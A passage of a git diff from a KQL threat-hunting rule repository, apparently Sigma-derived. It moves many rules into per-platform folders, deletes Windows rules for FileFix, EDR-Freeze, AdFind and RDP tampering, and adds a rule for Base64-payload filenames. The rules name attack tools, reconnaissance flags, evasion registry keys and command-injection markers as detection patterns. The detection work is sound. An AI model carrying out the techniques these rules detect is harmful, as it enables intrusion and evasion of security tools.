KQL/rules-threat-hunting/windows/registry/registry_set/microsoft_office_trusted_location_updated.kql diff --git a/KQL/rules-threat-hunting/Defense Evasion/registry_set_with_crypto_classes_from_the_cryptography_powershell_namespace.kql b/KQL/rules-threat-hunting/windows/registry/registry_set/registry_set_with_crypto_classes_from_the_cryptography_powershell_namespace.kql similarity index 100% rename from KQL/rules-threat-hunting/Defense Evasion/registry_set_with_crypto_classes_from_the_cryptography_powershell_namespace.kql rename to KQL/rules-threat-hunting/windows/registry/registry_set/registry_set_with_crypto_classes_from_the_cryptography_powershell_namespace.kql diff --git a/KQL/rules-threat-hunting/Defense Evasion/service_binary_in_user_controlled_folder.kql b/KQL/rules-threat-hunting/windows/registry/registry_set/service_binary_in_user_controlled_folder.kql similarity index 100% rename from KQL/rules-threat-hunting/Defense Evasion/service_binary_in_user_controlled_folder.kql rename to KQL/rules-threat-hunting/windows/registry/registry_set/service_binary_in_user_controlled_folder.kql diff --git a/KQL/rules-threat-hunting/Persistence/shell_context_menu_command_tampering.kql b/KQL/rules-threat-hunting/windows/registry/registry_set/shell_context_menu_command_tampering.kql similarity index 100% rename from KQL/rules-threat-hunting/Persistence/shell_context_menu_command_tampering.kql rename to KQL/rules-threat-hunting/windows/registry/registry_set/shell_context_menu_command_tampering.kql diff --git a/KQL/rules/Command and Control/file_download_from_browser_process_via_inline_url.kql b/KQL/rules/Command and Control/file_download_from_browser_process_via_inline_url.kql deleted file mode 100644 index 1eb1bf8c..00000000 --- a/KQL/rules/Command and Control/file_download_from_browser_process_via_inline_url.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Title: File Download From Browser Process Via Inline URL -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-01-11 -// Level: medium -// Description: Detects execution of a browser process with a URL argument pointing to a file with a potentially interesting extension. This can be abused to download arbitrary files or to hide from the user for example by launching the browser in a minimized state. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1105 - -DeviceProcessEvents -| where (ProcessCommandLine endswith ".7z" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".txt" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".zip") and ProcessCommandLine contains "http" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed.kql b/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed.kql deleted file mode 100644 index 545a01d6..00000000 --- a/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed.kql +++ /dev/null @@ -1,13 +0,0 @@ -// Title: RDP Sensitive Settings Changed -// Author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali -// Date: 2022-08-06 -// Level: high -// Description: Detects tampering of RDP Terminal Service/Server sensitive settings. -// Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.persistence, attack.t1112 -// False Positives: -// - Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way) - -DeviceRegistryEvents -| where ((RegistryValueData in~ ("DWORD (0x00000001)", "DWORD (0x00000002)", "DWORD (0x00000003)", "DWORD (0x00000004)")) and (RegistryKey endswith "\\Control\\Terminal Server*" or RegistryKey endswith "\\Windows NT\\Terminal Services*") and RegistryKey endswith "\\Shadow") or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "\\Control\\Terminal Server*" or RegistryKey endswith "\\Windows NT\\Terminal Services*") and (RegistryKey endswith "\\DisableRemoteDesktopAntiAlias" or RegistryKey endswith "\\DisableSecuritySettings" or RegistryKey endswith "\\fAllowUnsolicited" or RegistryKey endswith "\\fAllowUnsolicitedFullControl")) or (RegistryKey contains "\\Control\\Terminal Server\\InitialProgram" or RegistryKey contains "\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\InitialProgram" or RegistryKey contains "\\services\\TermService\\Parameters\\ServiceDll" or RegistryKey contains "\\Windows NT\\Terminal Services\\InitialProgram") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_process_suspension_via_werfaultsecure_through_edr_freeze.kql b/KQL/rules/Defense Evasion/suspicious_process_suspension_via_werfaultsecure_through_edr_freeze.kql deleted file mode 100644 index 966b5909..00000000 --- a/KQL/rules/Defense Evasion/suspicious_process_suspension_via_werfaultsecure_through_edr_freeze.kql +++ /dev/null @@ -1,12 +0,0 @@ -// Title: Suspicious Process Suspension via WERFaultSecure through EDR-Freeze -// Author: Jason (https://github.com/0xbcf) -// Date: 2025-09-23 -// Level: high -// Description: Detects attempts to freeze a process likely an EDR or an antimalware service process through EDR-Freeze that abuses the WerFaultSecure.exe process to suspend security software. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - Legitimate usage of WerFaultSecure for debugging purposes - -DeviceProcessEvents -| where (ProcessCommandLine contains " /h " and ProcessCommandLine contains " /pid " and ProcessCommandLine contains " /tid " and ProcessCommandLine contains " /encfile " and ProcessCommandLine contains " /cancel " and ProcessCommandLine contains " /type " and ProcessCommandLine contains " 268310") and (FolderPath endswith "\\WerFaultSecure.exe" or ProcessVersionInfoOriginalFileName =~ "WerFaultSecure.exe") \ No newline at end of file diff --git a/KQL/rules/Discovery/pua_adfind_suspicious_execution.kql b/KQL/rules/Discovery/pua_adfind_suspicious_execution.kql deleted file mode 100644 index 5ba453f0..00000000 --- a/KQL/rules/Discovery/pua_adfind_suspicious_execution.kql +++ /dev/null @@ -1,12 +0,0 @@ -// Title: PUA - AdFind Suspicious Execution -// Author: Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community -// Date: 2021-02-02 -// Level: high -// Description: Detects AdFind execution with common flags seen used during attacks -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1018, attack.t1087.002, attack.t1482, attack.t1069.002, stp.1u -// False Positives: -// - Legitimate admin activity - -DeviceProcessEvents -| where ProcessCommandLine contains "domainlist" or ProcessCommandLine contains "trustdmp" or ProcessCommandLine contains "dcmodes" or ProcessCommandLine contains "adinfo" or ProcessCommandLine contains " dclist " or ProcessCommandLine contains "computer_pwdnotreqd" or ProcessCommandLine contains "objectcategory=" or ProcessCommandLine contains "-subnets -f" or ProcessCommandLine contains "name=\"Domain Admins\"" or ProcessCommandLine contains "-sc u:" or ProcessCommandLine contains "domainncs" or ProcessCommandLine contains "dompol" or ProcessCommandLine contains " oudmp " or ProcessCommandLine contains "subnetdmp" or ProcessCommandLine contains "gpodmp" or ProcessCommandLine contains "fspdmp" or ProcessCommandLine contains "users_noexpire" or ProcessCommandLine contains "computers_active" or ProcessCommandLine contains "computers_pwdnotreqd" \ No newline at end of file diff --git a/KQL/rules/Execution/filefix_command_evidence_in_typedpaths_from_browser_file_upload_abuse.kql b/KQL/rules/Execution/filefix_command_evidence_in_typedpaths_from_browser_file_upload_abuse.kql deleted file mode 100644 index e2daa199..00000000 --- a/KQL/rules/Execution/filefix_command_evidence_in_typedpaths_from_browser_file_upload_abuse.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Title: FileFix - Command Evidence in TypedPaths from Browser File Upload Abuse -// Author: Alfie Champion (delivr.to) -// Date: 2025-07-05 -// Level: high -// Description: Detects commonly-used chained commands and strings in the most recent 'url' value of the 'TypedPaths' key, which could be indicative of a user being targeted by the FileFix technique. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1204.004 - -DeviceRegistryEvents -| where (RegistryValueData contains "#" and (InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe") and RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths\\url1") and (RegistryValueData contains "cmd" or RegistryValueData contains "curl" or RegistryValueData contains "powershell" or RegistryValueData contains "bitsadmin" or RegistryValueData contains "certutil" or RegistryValueData contains "mshta" or RegistryValueData contains "regsvr32") \ No newline at end of file diff --git a/KQL/rules/Execution/filefix_suspicious_child_process_from_browser_file_upload_abuse.kql b/KQL/rules/Execution/filefix_suspicious_child_process_from_browser_file_upload_abuse.kql deleted file mode 100644 index 57df535d..00000000 --- a/KQL/rules/Execution/filefix_suspicious_child_process_from_browser_file_upload_abuse.kql +++ /dev/null @@ -1,14 +0,0 @@ -// Title: FileFix - Suspicious Child Process from Browser File Upload Abuse -// Author: 0xFustang -// Date: 2025-06-26 -// Level: high -// Description: Detects potentially suspicious subprocesses such as LOLBINs spawned by web browsers. This activity could be associated with the "FileFix" social engineering technique, -// where users are tricked into launching the file explorer via a browser-based phishing page and pasting malicious commands into the address bar. -// The technique abuses clipboard manipulation and disguises command execution as benign file path access, resulting in covert execution of system utilities. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1204.004 -// False Positives: -// - Legitimate use of PowerShell or other utilities launched from browser extensions or automation tools - -DeviceProcessEvents -| where ProcessCommandLine contains "#" and (FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe") and (InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/fsutil_behavior_set_symlinkevaluation.kql b/KQL/rules/Execution/fsutil_behavior_set_symlinkevaluation.kql deleted file mode 100644 index 98e445c1..00000000 --- a/KQL/rules/Execution/fsutil_behavior_set_symlinkevaluation.kql +++ /dev/null @@ -1,13 +0,0 @@ -// Title: Fsutil Behavior Set SymlinkEvaluation -// Author: frack113 -// Date: 2022-03-02 -// Level: medium -// Description: A symbolic link is a type of file that contains a reference to another file. -// This is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059 -// False Positives: -// - Legitimate use - -DeviceProcessEvents -| where (ProcessCommandLine contains "behavior " and ProcessCommandLine contains "set " and ProcessCommandLine contains "SymlinkEvaluation") and (FolderPath endswith "\\fsutil.exe" or ProcessVersionInfoOriginalFileName =~ "fsutil.exe") \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_persistence_via_new_amsi_providers_registry.kql b/KQL/rules/Persistence/potential_persistence_via_new_amsi_providers_registry.kql deleted file mode 100644 index 7b921e94..00000000 --- a/KQL/rules/Persistence/potential_persistence_via_new_amsi_providers_registry.kql +++ /dev/null @@ -1,12 +0,0 @@ -// Title: Potential Persistence Via New AMSI Providers - Registry -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-07-21 -// Level: high -// Description: Detects when an attacker registers a new AMSI provider in order to achieve persistence -// MITRE Tactic: Persistence -// Tags: attack.persistence -// False Positives: -// - Legitimate security products adding their own AMSI providers. Filter these according to your environment - -DeviceRegistryEvents -| where (ActionType =~ "RegistryKeyCreated" and (RegistryKey endswith "\\SOFTWARE\\Microsoft\\AMSI\\Providers*" or RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\AMSI\\Providers*")) and (not((InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\"))) \ No newline at end of file diff --git a/KQL/rules/Resource Development/suspicious_execution_of_renamed_sysinternals_tools_registry.kql b/KQL/rules/Resource Development/suspicious_execution_of_renamed_sysinternals_tools_registry.kql deleted file mode 100644 index 71f6738d..00000000 --- a/KQL/rules/Resource Development/suspicious_execution_of_renamed_sysinternals_tools_registry.kql +++ /dev/null @@ -1,12 +0,0 @@ -// Title: Suspicious Execution Of Renamed Sysinternals Tools - Registry -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-24 -// Level: high -// Description: Detects the creation of the "accepteula" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool) -// MITRE Tactic: Resource Development -// Tags: attack.resource-development, attack.t1588.002 -// False Positives: -// - Unlikely - -DeviceRegistryEvents -| where (ActionType =~ "RegistryKeyCreated" and (RegistryKey contains "\\Active Directory Explorer" or RegistryKey contains "\\Handle" or RegistryKey contains "\\LiveKd" or RegistryKey contains "\\ProcDump" or RegistryKey contains "\\Process Explorer" or RegistryKey contains "\\PsExec" or RegistryKey contains "\\PsLoggedon" or RegistryKey contains "\\PsLoglist" or RegistryKey contains "\\PsPasswd" or RegistryKey contains "\\PsPing" or RegistryKey contains "\\PsService" or RegistryKey contains "\\SDelete") and RegistryKey endswith "\\EulaAccepted") and (not((InitiatingProcessFolderPath endswith "\\ADExplorer.exe" or InitiatingProcessFolderPath endswith "\\ADExplorer64.exe" or InitiatingProcessFolderPath endswith "\\handle.exe" or InitiatingProcessFolderPath endswith "\\handle64.exe" or InitiatingProcessFolderPath endswith "\\livekd.exe" or InitiatingProcessFolderPath endswith "\\livekd64.exe" or InitiatingProcessFolderPath endswith "\\procdump.exe" or InitiatingProcessFolderPath endswith "\\procdump64.exe" or InitiatingProcessFolderPath endswith "\\procexp.exe" or InitiatingProcessFolderPath endswith "\\procexp64.exe" or InitiatingProcessFolderPath endswith "\\PsExec.exe" or InitiatingProcessFolderPath endswith "\\PsExec64.exe" or InitiatingProcessFolderPath endswith "\\PsLoggedon.exe" or InitiatingProcessFolderPath endswith "\\PsLoggedon64.exe" or InitiatingProcessFolderPath endswith "\\psloglist.exe" or InitiatingProcessFolderPath endswith "\\psloglist64.exe" or InitiatingProcessFolderPath endswith "\\pspasswd.exe" or InitiatingProcessFolderPath endswith "\\pspasswd64.exe" or InitiatingProcessFolderPath endswith "\\PsPing.exe" or InitiatingProcessFolderPath endswith "\\PsPing64.exe" or InitiatingProcessFolderPath endswith "\\PsService.exe" or InitiatingProcessFolderPath endswith "\\PsService64.exe" or InitiatingProcessFolderPath endswith "\\sdelete.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/linux_doas_conf_file_creation.kql b/KQL/rules/linux/file_event/linux_doas_conf_file_creation.kql similarity index 100% rename from KQL/rules/Defense Evasion/linux_doas_conf_file_creation.kql rename to KQL/rules/linux/file_event/linux_doas_conf_file_creation.kql diff --git a/KQL/rules/Privilege Escalation/persistence_via_cron_files.kql b/KQL/rules/linux/file_event/persistence_via_cron_files.kql similarity index 100% rename from KQL/rules/Privilege Escalation/persistence_via_cron_files.kql rename to KQL/rules/linux/file_event/persistence_via_cron_files.kql diff --git a/KQL/rules/Privilege Escalation/persistence_via_sudoers_files.kql b/KQL/rules/linux/file_event/persistence_via_sudoers_files.kql similarity index 100% rename from KQL/rules/Privilege Escalation/persistence_via_sudoers_files.kql rename to KQL/rules/linux/file_event/persistence_via_sudoers_files.kql diff --git a/KQL/rules/Persistence/potentially_suspicious_shell_script_creation_in_profile_folder.kql b/KQL/rules/linux/file_event/potentially_suspicious_shell_script_creation_in_profile_folder.kql similarity index 100% rename from KQL/rules/Persistence/potentially_suspicious_shell_script_creation_in_profile_folder.kql rename to KQL/rules/linux/file_event/potentially_suspicious_shell_script_creation_in_profile_folder.kql diff --git a/KQL/rules/linux/file_event/suspicious_filename_with_embedded_base64_commands.kql b/KQL/rules/linux/file_event/suspicious_filename_with_embedded_base64_commands.kql new file mode 100644 index 00000000..dcacdacf --- /dev/null +++ b/KQL/rules/linux/file_event/suspicious_filename_with_embedded_base64_commands.kql @@ -0,0 +1,13 @@ +// Title: Suspicious Filename with Embedded Base64 Commands +// Author: @kostastsale +// Date: 2025-11-22 +// Level: high +// Description: Detects files with specially crafted filenames that embed Base64-encoded bash payloads designed to execute when processed by shell scripts. +// These filenames exploit shell interpretation quirks to trigger hidden commands, a technique observed in VShell malware campaigns. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.004, attack.defense-evasion, attack.t1027 +// False Positives: +// - Legitimate files with similar naming patterns (very unlikely). + +DeviceFileEvents +| where FolderPath contains "{echo" or FolderPath contains "{base64,-d}" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_default_lockfile.kql b/KQL/rules/linux/file_event/triple_cross_ebpf_rootkit_default_lockfile.kql similarity index 100% rename from KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_default_lockfile.kql rename to KQL/rules/linux/file_event/triple_cross_ebpf_rootkit_default_lockfile.kql diff --git a/KQL/rules/Privilege Escalation/triple_cross_ebpf_rootkit_default_persistence.kql b/KQL/rules/linux/file_event/triple_cross_ebpf_rootkit_default_persistence.kql similarity index 100% rename from KQL/rules/Privilege Escalation/triple_cross_ebpf_rootkit_default_persistence.kql rename to KQL/rules/linux/file_event/triple_cross_ebpf_rootkit_default_persistence.kql diff --git a/KQL/rules/Command and Control/wget_creating_files_in_tmp_directory.kql b/KQL/rules/linux/file_event/wget_creating_files_in_tmp_directory.kql similarity index 100% rename from KQL/rules/Command and Control/wget_creating_files_in_tmp_directory.kql rename to KQL/rules/linux/file_event/wget_creating_files_in_tmp_directory.kql diff --git a/KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated_linux.kql b/KQL/rules/linux/network_connection/communication_to_localtonet_tunneling_service_initiated_linux.kql similarity index 100% rename from KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated_linux.kql rename to KQL/rules/linux/network_connection/communication_to_localtonet_tunneling_service_initiated_linux.kql diff --git a/KQL/rules/Exfiltration/communication_to_ngrok_tunneling_service_linux.kql b/KQL/rules/linux/network_connection/communication_to_ngrok_tunneling_service_linux.kql similarity index 100% rename from KQL/rules/Exfiltration/communication_to_ngrok_tunneling_service_linux.kql rename to KQL/rules/linux/network_connection/communication_to_ngrok_tunneling_service_linux.kql diff --git a/KQL/rules/Impact/linux_crypto_mining_pool_connections.kql b/KQL/rules/linux/network_connection/linux_crypto_mining_pool_connections.kql similarity index 100% rename from KQL/rules/Impact/linux_crypto_mining_pool_connections.kql rename to KQL/rules/linux/network_connection/linux_crypto_mining_pool_connections.kql diff --git a/KQL/rules/Execution/linux_reverse_shell_indicator.kql b/KQL/rules/linux/network_connection/linux_reverse_shell_indicator.kql similarity index 100% rename from KQL/rules/Execution/linux_reverse_shell_indicator.kql rename to KQL/rules/linux/network_connection/linux_reverse_shell_indicator.kql diff --git a/KQL/rules/Persistence/potentially_suspicious_malware_callback_communication_linux.kql b/KQL/rules/linux/network_connection/potentially_suspicious_malware_callback_communication_linux.kql similarity index 100% rename from KQL/rules/Persistence/potentially_suspicious_malware_callback_communication_linux.kql rename to KQL/rules/linux/network_connection/potentially_suspicious_malware_callback_communication_linux.kql diff --git a/KQL/rules/Reconnaissance/access_of_sudoers_file_content.kql b/KQL/rules/linux/process_creation/access_of_sudoers_file_content.kql similarity index 100% rename from KQL/rules/Reconnaissance/access_of_sudoers_file_content.kql rename to KQL/rules/linux/process_creation/access_of_sudoers_file_content.kql diff --git a/KQL/rules/Defense Evasion/audit_rules_deleted_via_auditctl.kql b/KQL/rules/linux/process_creation/audit_rules_deleted_via_auditctl.kql similarity index 100% rename from KQL/rules/Defense Evasion/audit_rules_deleted_via_auditctl.kql rename to KQL/rules/linux/process_creation/audit_rules_deleted_via_auditctl.kql diff --git a/KQL/rules/Execution/bash_interactive_shell.kql b/KQL/rules/linux/process_creation/bash_interactive_shell.kql similarity index 100% rename from KQL/rules/Execution/bash_interactive_shell.kql rename to KQL/rules/linux/process_creation/bash_interactive_shell.kql diff --git a/KQL/rules/Execution/bpftrace_unsafe_option_usage.kql b/KQL/rules/linux/process_creation/bpftrace_unsafe_option_usage.kql similarity index 100% rename from KQL/rules/Execution/bpftrace_unsafe_option_usage.kql rename to KQL/rules/linux/process_creation/bpftrace_unsafe_option_usage.kql diff --git a/KQL/rules/Discovery/capabilities_discovery_linux.kql b/KQL/rules/linux/process_creation/capabilities_discovery_linux.kql similarity index 100% rename from KQL/rules/Discovery/capabilities_discovery_linux.kql rename to KQL/rules/linux/process_creation/capabilities_discovery_linux.kql diff --git a/KQL/rules/Execution/capsh_shell_invocation_linux.kql b/KQL/rules/linux/process_creation/capsh_shell_invocation_linux.kql similarity index 100% rename from KQL/rules/Execution/capsh_shell_invocation_linux.kql rename to KQL/rules/linux/process_creation/capsh_shell_invocation_linux.kql diff --git a/KQL/rules/Defense Evasion/chmod_suspicious_directory.kql b/KQL/rules/linux/process_creation/chmod_suspicious_directory.kql similarity index 100% rename from KQL/rules/Defense Evasion/chmod_suspicious_directory.kql rename to KQL/rules/linux/process_creation/chmod_suspicious_directory.kql diff --git a/KQL/rules/Defense Evasion/clear_linux_logs.kql b/KQL/rules/linux/process_creation/clear_linux_logs.kql similarity index 100% rename from KQL/rules/Defense Evasion/clear_linux_logs.kql rename to KQL/rules/linux/process_creation/clear_linux_logs.kql diff --git a/KQL/rules/Collection/clipboard_collection_with_xclip_tool.kql b/KQL/rules/linux/process_creation/clipboard_collection_with_xclip_tool.kql similarity index 100% rename from KQL/rules/Collection/clipboard_collection_with_xclip_tool.kql rename to KQL/rules/linux/process_creation/clipboard_collection_with_xclip_tool.kql diff --git a/KQL/rules/Defense Evasion/connection_proxy.kql b/KQL/rules/linux/process_creation/connection_proxy.kql similarity index 100% rename from KQL/rules/Defense Evasion/connection_proxy.kql rename to KQL/rules/linux/process_creation/connection_proxy.kql diff --git a/KQL/rules/Discovery/container_residence_discovery_via_proc_virtual_fs.kql b/KQL/rules/linux/process_creation/container_residence_discovery_via_proc_virtual_fs.kql similarity index 100% rename from KQL/rules/Discovery/container_residence_discovery_via_proc_virtual_fs.kql rename to KQL/rules/linux/process_creation/container_residence_discovery_via_proc_virtual_fs.kql diff --git a/KQL/rules/Credential Access/copy_passwd_or_shadow_from_tmp_path.kql b/KQL/rules/linux/process_creation/copy_passwd_or_shadow_from_tmp_path.kql similarity index 100% rename from KQL/rules/Credential Access/copy_passwd_or_shadow_from_tmp_path.kql rename to KQL/rules/linux/process_creation/copy_passwd_or_shadow_from_tmp_path.kql diff --git a/KQL/rules/Discovery/crontab_enumeration.kql b/KQL/rules/linux/process_creation/crontab_enumeration.kql similarity index 100% rename from KQL/rules/Discovery/crontab_enumeration.kql rename to KQL/rules/linux/process_creation/crontab_enumeration.kql diff --git a/KQL/rules/Command and Control/curl_usage_on_linux.kql b/KQL/rules/linux/process_creation/curl_usage_on_linux.kql similarity index 100% rename from KQL/rules/Command and Control/curl_usage_on_linux.kql rename to KQL/rules/linux/process_creation/curl_usage_on_linux.kql diff --git a/KQL/rules/Impact/dd_file_overwrite.kql b/KQL/rules/linux/process_creation/dd_file_overwrite.kql similarity index 100% rename from KQL/rules/Impact/dd_file_overwrite.kql rename to KQL/rules/linux/process_creation/dd_file_overwrite.kql diff --git a/KQL/rules/Defense Evasion/decode_base64_encoded_text.kql b/KQL/rules/linux/process_creation/decode_base64_encoded_text.kql similarity index 100% rename from KQL/rules/Defense Evasion/decode_base64_encoded_text.kql rename to KQL/rules/linux/process_creation/decode_base64_encoded_text.kql diff --git a/KQL/rules/Defense Evasion/disable_or_stop_services.kql b/KQL/rules/linux/process_creation/disable_or_stop_services.kql similarity index 100% rename from KQL/rules/Defense Evasion/disable_or_stop_services.kql rename to KQL/rules/linux/process_creation/disable_or_stop_services.kql diff --git a/KQL/rules/Defense Evasion/disabling_security_tools.kql b/KQL/rules/linux/process_creation/disabling_security_tools.kql similarity index 100% rename from KQL/rules/Defense Evasion/disabling_security_tools.kql rename to KQL/rules/linux/process_creation/disabling_security_tools.kql diff --git a/KQL/rules/Discovery/docker_container_discovery_via_dockerenv_listing.kql b/KQL/rules/linux/process_creation/docker_container_discovery_via_dockerenv_listing.kql similarity index 100% rename from KQL/rules/Discovery/docker_container_discovery_via_dockerenv_listing.kql rename to KQL/rules/linux/process_creation/docker_container_discovery_via_dockerenv_listing.kql diff --git a/KQL/rules/Command and Control/download_file_to_potentially_suspicious_directory_via_wget.kql b/KQL/rules/linux/process_creation/download_file_to_potentially_suspicious_directory_via_wget.kql similarity index 100% rename from KQL/rules/Command and Control/download_file_to_potentially_suspicious_directory_via_wget.kql rename to KQL/rules/linux/process_creation/download_file_to_potentially_suspicious_directory_via_wget.kql diff --git a/KQL/rules/Execution/enable_bpf_kprobes_tracing.kql b/KQL/rules/linux/process_creation/enable_bpf_kprobes_tracing.kql similarity index 100% rename from KQL/rules/Execution/enable_bpf_kprobes_tracing.kql rename to KQL/rules/linux/process_creation/enable_bpf_kprobes_tracing.kql diff --git a/KQL/rules/Persistence/esxi_account_creation_via_esxcli.kql b/KQL/rules/linux/process_creation/esxi_account_creation_via_esxcli.kql similarity index 100% rename from KQL/rules/Persistence/esxi_account_creation_via_esxcli.kql rename to KQL/rules/linux/process_creation/esxi_account_creation_via_esxcli.kql diff --git a/KQL/rules/Persistence/esxi_admin_permission_assigned_to_account_via_esxcli.kql b/KQL/rules/linux/process_creation/esxi_admin_permission_assigned_to_account_via_esxcli.kql similarity index 100% rename from KQL/rules/Persistence/esxi_admin_permission_assigned_to_account_via_esxcli.kql rename to KQL/rules/linux/process_creation/esxi_admin_permission_assigned_to_account_via_esxcli.kql diff --git a/KQL/rules/Discovery/esxi_network_configuration_discovery_via_esxcli.kql b/KQL/rules/linux/process_creation/esxi_network_configuration_discovery_via_esxcli.kql similarity index 100% rename from KQL/rules/Discovery/esxi_network_configuration_discovery_via_esxcli.kql rename to KQL/rules/linux/process_creation/esxi_network_configuration_discovery_via_esxcli.kql diff --git a/KQL/rules/Discovery/esxi_storage_information_discovery_via_esxcli.kql b/KQL/rules/linux/process_creation/esxi_storage_information_discovery_via_esxcli.kql similarity index 100% rename from KQL/rules/Discovery/esxi_storage_information_discovery_via_esxcli.kql rename to KQL/rules/linux/process_creation/esxi_storage_information_discovery_via_esxcli.kql diff --git a/KQL/rules/Defense Evasion/esxi_syslog_configuration_change_via_esxcli.kql b/KQL/rules/linux/process_creation/esxi_syslog_configuration_change_via_esxcli.kql similarity index 100% rename from KQL/rules/Defense Evasion/esxi_syslog_configuration_change_via_esxcli.kql rename to KQL/rules/linux/process_creation/esxi_syslog_configuration_change_via_esxcli.kql diff --git a/KQL/rules/Discovery/esxi_system_information_discovery_via_esxcli.kql b/KQL/rules/linux/process_creation/esxi_system_information_discovery_via_esxcli.kql similarity index 100% rename from KQL/rules/Discovery/esxi_system_information_discovery_via_esxcli.kql rename to KQL/rules/linux/process_creation/esxi_system_information_discovery_via_esxcli.kql diff --git a/KQL/rules/Execution/esxi_vm_kill_via_esxcli.kql b/KQL/rules/linux/process_creation/esxi_vm_kill_via_esxcli.kql similarity index 100% rename from KQL/rules/Execution/esxi_vm_kill_via_esxcli.kql rename to KQL/rules/linux/process_creation/esxi_vm_kill_via_esxcli.kql diff --git a/KQL/rules/Discovery/esxi_vm_list_discovery_via_esxcli.kql b/KQL/rules/linux/process_creation/esxi_vm_list_discovery_via_esxcli.kql similarity index 100% rename from KQL/rules/Discovery/esxi_vm_list_discovery_via_esxcli.kql rename to KQL/rules/linux/process_creation/esxi_vm_list_discovery_via_esxcli.kql diff --git a/KQL/rules/Discovery/esxi_vsan_information_discovery_via_esxcli.kql b/KQL/rules/linux/process_creation/esxi_vsan_information_discovery_via_esxcli.kql similarity index 100% rename from KQL/rules/Discovery/esxi_vsan_information_discovery_via_esxcli.kql rename to KQL/rules/linux/process_creation/esxi_vsan_information_discovery_via_esxcli.kql diff --git a/KQL/rules/Execution/execution_of_script_located_in_potentially_suspicious_directory.kql b/KQL/rules/linux/process_creation/execution_of_script_located_in_potentially_suspicious_directory.kql similarity index 100% rename from KQL/rules/Execution/execution_of_script_located_in_potentially_suspicious_directory.kql rename to KQL/rules/linux/process_creation/execution_of_script_located_in_potentially_suspicious_directory.kql diff --git a/KQL/rules/Discovery/file_and_directory_discovery_linux.kql b/KQL/rules/linux/process_creation/file_and_directory_discovery_linux.kql similarity index 100% rename from KQL/rules/Discovery/file_and_directory_discovery_linux.kql rename to KQL/rules/linux/process_creation/file_and_directory_discovery_linux.kql diff --git a/KQL/rules/Defense Evasion/file_deletion.kql b/KQL/rules/linux/process_creation/file_deletion.kql similarity index 100% rename from KQL/rules/Defense Evasion/file_deletion.kql rename to KQL/rules/linux/process_creation/file_deletion.kql diff --git a/KQL/rules/Defense Evasion/flush_iptables_ufw_chain.kql b/KQL/rules/linux/process_creation/flush_iptables_ufw_chain.kql similarity index 100% rename from KQL/rules/Defense Evasion/flush_iptables_ufw_chain.kql rename to KQL/rules/linux/process_creation/flush_iptables_ufw_chain.kql diff --git a/KQL/rules/Impact/group_has_been_deleted_via_groupdel.kql b/KQL/rules/linux/process_creation/group_has_been_deleted_via_groupdel.kql similarity index 100% rename from KQL/rules/Impact/group_has_been_deleted_via_groupdel.kql rename to KQL/rules/linux/process_creation/group_has_been_deleted_via_groupdel.kql diff --git a/KQL/rules/Impact/history_file_deletion.kql b/KQL/rules/linux/process_creation/history_file_deletion.kql similarity index 100% rename from KQL/rules/Impact/history_file_deletion.kql rename to KQL/rules/linux/process_creation/history_file_deletion.kql diff --git 